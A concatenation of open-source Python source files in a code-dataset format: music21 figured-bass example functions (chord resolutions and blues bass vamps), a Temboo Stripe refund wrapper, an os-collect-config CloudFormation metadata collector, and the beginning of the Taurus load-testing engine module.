def viio65ResolutionExample():
'''
For a fully diminished seventh chord resolving to the tonic, the resolution chord
can contain either a doubled third (standard resolution) or a doubled tonic (alternate
resolution), depending on whether the third of the diminished chord rises or falls.
The user can control this in a Rules object by modifying :attr:`~music21.figuredBass.rules.Rules.doubledRootInDim7`.
However, when resolving a diminished 6,5, the third is found in the bass and the
proper resolution is determined in context, regardless of user preference.
The following shows both cases involving a diminished 6,5. The resolution of the
first diminished chord has a doubled D, while that of the second has a doubled F#.
Notice that the resolution of the first involves a diminished fifth (E, Bb) going
to a perfect fifth (D, A).
>>> from music21.figuredBass import examples
>>> fbLine = examples.viio65ResolutionExample()
>>> fbRealization = fbLine.realize()
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_vii65.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinyNotation: 4/4 D2 E2_6,b5 D2 E2_6,b5 F#1_6", makeNotation=False)
s.insert(0, key.Key('D'))
return realizer.figuredBassFromStream(s)
def augmentedSixthResolutionExample():
'''
This example was retrieved from page 61 of *The Music Theory Handbook* by Marjorie Merryman.
Italian (8,#6,3), French (#6,4,3), German (#6,5,3), and Swiss (#6,#4,3) augmented sixth resolutions to
either the major dominant or the major/minor tonic 6,4 are supported. The first four bars show the
resolutions to the dominant in the order above, while the last bar shows the German augmented sixth
resolving to the tonic.
>>> from music21.figuredBass import examples
>>> fbLine = examples.augmentedSixthResolutionExample()
>>> fbRealization = fbLine.realize()
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_a6.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 D4 BB-4_8,#6,3 AA2_# D4 BB-4_#6,4,3 AA2_# D4 BB-4_#6,5,3 AA2_# D4 BB-4_#6,#4,3 AA2_# D4 BB-4_#6,5,3 AA2_6,4", makeNotation=False)
s.insert(0, key.Key('d'))
return realizer.figuredBassFromStream(s)
def italianA6ResolutionExample():
'''
The Italian augmented sixth chord (It+6) is the only augmented sixth chord to consist of only three
pitch names, and when represented in four parts, the tonic is doubled. The tonic can resolve up, down or
stay the same, and in four parts, the two tonics always resolve differently, resulting in two equally
acceptable resolutions. An alternate approach to resolving the It+6 chord was taken, such that an It+6
chord could map internally to two different resolutions. Every other special resolution in fbRealizer
consists of a 1:1 mapping of special chords to resolutions.
Here, the It+6 chord is resolving to the dominant, minor tonic, and major tonic, respectively. In the
dominant resolution shown, the tonics (D) are resolving inward, but they can resolve outward as well. In
the minor tonic resolution, the higher tonic is resolving up to F, and the lower tonic remains the same.
In the major tonic resolution, the higher tonic remains the same, while the lower tonic resolves up to the F#.
>>> from music21.figuredBass import examples
>>> from music21.figuredBass import rules
>>> fbLine = examples.italianA6ResolutionExample()
>>> fbRules = rules.Rules()
>>> fbRules.upperPartsMaxSemitoneSeparation = None
>>> fbRules.partMovementLimits.append([1,4])
>>> fbRealization = fbLine.realize(fbRules)
>>> fbRealization.keyboardStyleOutput = False
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_it+6.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: D4 BB-4_#6,3 AA2_# D4 BB-4_#6,3 AA2_6,4 D4 BB-4_#6,3 AA2_#6,4", makeNotation=False)
s.insert(0, key.Key('d'))
return realizer.figuredBassFromStream(s)
def twelveBarBlues():
'''
This is an progression in Bb major based on the twelve bar blues. The progression used is:
I | IV | I | I7
IV | IV | I | I7
V7 | IV6 | I | I
>>> from music21.figuredBass import examples
>>> from music21.figuredBass import rules
>>> bluesLine = examples.twelveBarBlues()
>>> #_DOCS_SHOW bluesLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bluesBassLine.*
:width: 700
>>> fbRules = rules.Rules()
>>> fbRules.partMovementLimits = [(1,4),(2,12),(3,12)]
>>> fbRules.forbidVoiceOverlap = False
>>> blRealization = bluesLine.realize(fbRules)
>>> blRealization.getNumSolutions()
2224978
>>> #_DOCS_SHOW blRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_twelveBarBlues.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: BB-1 E-1 BB-1 BB-1_7 E-1 E-1 BB-1 BB-1_7 F1_7 G1_6 BB-1 BB-1", makeNotation=False)
s.insert(0, key.Key('B-'))
return realizer.figuredBassFromStream(s)
# -----------------------------------------------------------------
# METHODS FOR GENERATION OF BLUES VAMPS
def generateBoogieVamp(blRealization = None, numRepeats = 5):
'''
Turns whole notes in twelve bar blues bass line to blues boogie woogie bass line. Takes
in numRepeats, which is the number of times to repeat the bass line. Also, takes in a
realization of :meth:`~music21.figuredBass.examples.twelveBarBlues`. If none is provided,
a default realization with :attr:`~music21.figuredBass.rules.Rules.forbidVoiceOverlap`
set to False and :attr:`~music21.figuredBass.rules.Rules.partMovementLimits` set to
[(1,4),(2,12),(3,12)] is used.
>>> from music21.figuredBass import examples
>>> #_DOCS_SHOW examples.generateBoogieVamp(numRepeats = 1).show()
.. image:: images/figuredBass/fbExamples_boogieVamp.*
:width: 700
'''
from music21 import converter, stream, interval
if blRealization == None:
bluesLine = twelveBarBlues()
fbRules = rules.Rules()
fbRules.partMovementLimits = [(1,4),(2,12),(3,12)]
fbRules.forbidVoiceOverlap = False
blRealization = bluesLine.realize(fbRules)
sampleScore = blRealization.generateRandomRealizations(numRepeats)
boogieBassLine = converter.parse("tinynotation: BB-8. D16 F8. G16 A-8. G16 F8. D16", makeNotation=False)
newBassLine = stream.Part()
newBassLine.append(sampleScore[1][0]) #Time signature
newBassLine.append(sampleScore[1][1]) #Key signature
for n in sampleScore[1].notes:
i = interval.notesToInterval(boogieBassLine[0], n)
tp = boogieBassLine.transpose(i)
for lyr in n.lyrics:
tp.notes[0].addLyric(lyr.text)
for m in tp.notes:
newBassLine.append(m)
newScore = stream.Score()
newScore.insert(0, sampleScore[0])
newScore.insert(newBassLine)
return newScore
def generateTripletBlues(blRealization = None, numRepeats = 5): #12/8
'''
Turns whole notes in twelve bar blues bass line to triplet blues bass line. Takes
in numRepeats, which is the number of times to repeat the bass line. Also, takes in a
realization of :meth:`~music21.figuredBass.examples.twelveBarBlues`. If none is provided,
a default realization with :attr:`~music21.figuredBass.rules.Rules.forbidVoiceOverlap`
set to False and :attr:`~music21.figuredBass.rules.Rules.partMovementLimits` set to
[(1,4),(2,12),(3,12)] is used.
>>> from music21.figuredBass import examples
>>> #_DOCS_SHOW examples.generateTripletBlues(numRepeats = 1).show()
.. image:: images/figuredBass/fbExamples_tripletBlues.*
:width: 700
'''
from music21 import converter, stream, interval, meter
if blRealization == None:
bluesLine = twelveBarBlues()
fbRules = rules.Rules()
fbRules.partMovementLimits = [(1,4),(2,12),(3,12)]
fbRules.forbidVoiceOverlap = False
blRealization = bluesLine.realize(fbRules)
sampleScore = blRealization.generateRandomRealizations(numRepeats)
tripletBassLine = converter.parse("tinynotation: BB-4 BB-8 D4 D8 F4 F8 A-8 G8 F8", makeNotation=False)
newBassLine = stream.Part()
for n in sampleScore[1].notes:
i = interval.notesToInterval(tripletBassLine[0], n)
tp = tripletBassLine.transpose(i)
for lyr in n.lyrics:
tp.notes[0].addLyric(lyr.text)
for m in tp.notes:
newBassLine.append(m)
newTopLine = stream.Part()
for sampleChord in sampleScore[0].notes:
sampleChordCopy = copy.deepcopy(sampleChord)
sampleChordCopy.quarterLength = 6.0
newTopLine.append(sampleChordCopy)
newScore = stream.Score()
newScore.append(meter.TimeSignature("12/8")) #Time signature
newScore.append(sampleScore[1][1]) #Key signature
newScore.insert(0, newTopLine)
newScore.insert(0, newBassLine)
return newScore
_DOC_ORDER = [exampleA, exampleB, exampleC, exampleD, V43ResolutionExample, viio65ResolutionExample,
augmentedSixthResolutionExample, italianA6ResolutionExample, twelveBarBlues,
generateBoogieVamp, generateTripletBlues]
#-------------------------------------------------------------------------------
class Test(unittest.TestCase):
def runTest(self):
pass
if __name__ == "__main__":
import music21
music21.mainTest(Test)
#------------------------------------------------------------------------------
# eof
| mit | 3,849,884,331,369,982,500 | 39.787686 | 172 | 0.665764 | false |
willprice/arduino-sphere-project | scripts/example_direction_finder/temboo/Library/Stripe/Charges/RefundCharge.py | 5 | 3456 | # -*- coding: utf-8 -*-
###############################################################################
#
# RefundCharge
# Issues a refund of an existing credit card charge.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class RefundCharge(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the RefundCharge Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(RefundCharge, self).__init__(temboo_session, '/Library/Stripe/Charges/RefundCharge')
def new_input_set(self):
return RefundChargeInputSet()
def _make_result_set(self, result, path):
return RefundChargeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return RefundChargeChoreographyExecution(session, exec_id, path)
class RefundChargeInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the RefundCharge
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Stripe)
"""
super(RefundChargeInputSet, self)._set_input('APIKey', value)
def set_Amount(self, value):
"""
Set the value of the Amount input for this Choreo. ((optional, integer) The amount to refund to the customer in cents. When left empty, the entire charge is refunded.)
"""
super(RefundChargeInputSet, self)._set_input('Amount', value)
def set_ChargeID(self, value):
"""
Set the value of the ChargeID input for this Choreo. ((required, string) The unique identifier of the charge to be refunded)
"""
super(RefundChargeInputSet, self)._set_input('ChargeID', value)
class RefundChargeResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the RefundCharge Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Stripe)
"""
return self._output.get('Response', None)
class RefundChargeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return RefundChargeResultSet(response, path)
| gpl-2.0 | -9,004,033,191,687,605,000 | 36.565217 | 175 | 0.672164 | false |
citrix-openstack-build/os-collect-config | os_collect_config/cfn.py | 1 | 6705 | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from keystoneclient.contrib.ec2 import utils as ec2_utils
from lxml import etree
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from os_collect_config import common
from os_collect_config import exc
from os_collect_config.openstack.common import log
CONF = cfg.CONF
logger = log.getLogger(__name__)
opts = [
cfg.StrOpt('metadata-url',
help='URL to query for CloudFormation Metadata'),
cfg.StrOpt('heat-metadata-hint',
default='/var/lib/heat-cfntools/cfn-metadata-server',
help='Local file to read for metadata url if not explicitly '
' specified'),
cfg.StrOpt('stack-name',
help='Stack name to describe'),
cfg.MultiStrOpt('path',
help='Path to Metadata'),
cfg.StrOpt('secret-access-key',
help='Secret Access Key'),
cfg.StrOpt('access-key-id',
help='Access Key ID'),
cfg.MultiStrOpt('deployment-key',
default=['deployments'],
help='Key(s) to explode into multiple collected outputs. '
'Parsed according to the expected Metadata created by '
'OS::Heat::StructuredDeployment. Only Exploded if seen at '
'the root of the Metadata.')
]
name = 'cfn'
class Collector(object):
def __init__(self, requests_impl=common.requests):
self._requests_impl = requests_impl
self._session = requests_impl.Session()
def collect(self):
if CONF.cfn.metadata_url is None:
if (CONF.cfn.heat_metadata_hint
and os.path.exists(CONF.cfn.heat_metadata_hint)):
with open(CONF.cfn.heat_metadata_hint) as hint:
CONF.cfn.metadata_url = '%s/v1/' % hint.read().strip()
else:
logger.warn('No metadata_url configured.')
raise exc.CfnMetadataNotConfigured
if CONF.cfn.access_key_id is None:
logger.warn('No Access Key ID configured.')
raise exc.CfnMetadataNotConfigured
if CONF.cfn.secret_access_key is None:
logger.warn('No Secret Access Key configured.')
raise exc.CfnMetadataNotConfigured
url = CONF.cfn.metadata_url
stack_name = CONF.cfn.stack_name
headers = {'Content-Type': 'application/json'}
final_content = {}
if CONF.cfn.path is None:
logger.warn('No path configured')
raise exc.CfnMetadataNotConfigured
signer = ec2_utils.Ec2Signer(secret_key=CONF.cfn.secret_access_key)
for path in CONF.cfn.path:
if '.' not in path:
logger.error('Path not in format resource.field[.x.y] (%s)' %
path)
raise exc.CfnMetadataNotConfigured
resource, field = path.split('.', 1)
if '.' in field:
field, sub_path = field.split('.', 1)
else:
sub_path = ''
params = {'Action': 'DescribeStackResource',
'StackName': stack_name,
'LogicalResourceId': resource,
'AWSAccessKeyId': CONF.cfn.access_key_id,
'SignatureVersion': '2'}
parsed_url = urlparse.urlparse(url)
credentials = {'params': params,
'verb': 'GET',
'host': parsed_url.netloc,
'path': parsed_url.path}
params['Signature'] = signer.generate(credentials)
try:
content = self._session.get(
url, params=params, headers=headers)
content.raise_for_status()
except self._requests_impl.exceptions.RequestException as e:
logger.warn(e)
raise exc.CfnMetadataNotAvailable
map_content = etree.fromstring(content.text)
resource_detail = map_content.find(
'DescribeStackResourceResult').find('StackResourceDetail')
sub_element = resource_detail.find(field)
if sub_element is None:
logger.warn('Path %s does not exist.' % (path))
raise exc.CfnMetadataNotAvailable
try:
value = json.loads(sub_element.text)
except ValueError as e:
logger.warn(
'Path %s failed to parse as json. (%s)' % (path, e))
raise exc.CfnMetadataNotAvailable
if sub_path:
for subkey in sub_path.split('.'):
try:
value = value[subkey]
except KeyError:
logger.warn(
'Sub-key %s does not exist. (%s)' % (subkey, path))
raise exc.CfnMetadataNotAvailable
final_content.update(value)
final_list = []
for depkey in cfg.CONF.cfn.deployment_key:
if depkey in final_content:
deployments = final_content[depkey]
if not isinstance(deployments, list):
logger.warn(
'Deployment-key %s was found but does not contain a '
'list.' % (depkey,))
continue
logger.debug(
'Deployment found for %s' % (depkey,))
for deployment in deployments:
if 'name' not in deployment:
logger.warn(
'No name found for a deployment under %s.' %
(depkey,))
continue
if deployment.get('group', 'Heat::Ungrouped') in (
'os-apply-config', 'Heat::Ungrouped'):
final_list.append((deployment['name'],
deployment['config']))
final_list.insert(0, ('cfn', final_content))
return final_list
| apache-2.0 | 3,027,588,708,427,825,000 | 41.707006 | 79 | 0.544817 | false |
Blazemeter/taurus | bzt/engine/engine.py | 1 | 29705 | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
from urllib import parse
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.utils import reraise, load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux, temp_file
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from bzt.utils import NETWORK_PROBLEMS
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
from ..environment_helpers import expand_variable_with_os, custom_expandvars, expand_envs_with_os
from bzt.resources.version import VERSION, DEV_VERSION
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]EXEC
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self.user_pythonpath = None
self.temp_pythonpath = None
self._http_client = None
self.graceful_tmp = None
def set_pythonpath(self):
version = sys.version.split(' ')[0]
path_suffix = os.path.join('python-packages', version)
self.user_pythonpath = get_full_path(os.path.join("~", ".bzt", path_suffix))
self.temp_pythonpath = get_full_path(os.path.join(self.artifacts_dir, path_suffix))
current_pythonpath = os.environ.get('PYTHONPATH', '')
paths = self.user_pythonpath, self.temp_pythonpath, current_pythonpath
self.log.debug("Set PYTHONPATH to :\n\tUSER: '{}' +\n\tTEMP: '{}' +\n\tCURRENT: '{}'".format(*paths))
try:
user_packages = os.listdir(self.user_pythonpath)
except:
user_packages = []
self.log.debug("Content of user packages dir: {}".format(user_packages))
os.environ['PYTHONPATH'] = os.pathsep.join(paths)
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
self.graceful_tmp = self.create_artifact(prefix="GRACEFUL", suffix="")
env = env.get()
env['GRACEFUL'] = self.graceful_tmp
return shell_exec(args, cwd=cwd, env=env, **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
if self.graceful_tmp:
open(self.graceful_tmp, 'x').close()
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if self.graceful_tmp and os.path.exists(self.graceful_tmp):
os.remove(self.graceful_tmp)
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = self.__expand_artifacts_dir()
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def __expand_artifacts_dir(self):
envs = self.__get_envs_from_config()
artifacts_dir = custom_expandvars(self.artifacts_dir, envs)
artifacts_dir = expand_variable_with_os(artifacts_dir)
artifacts_dir = get_full_path(artifacts_dir)
return artifacts_dir
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
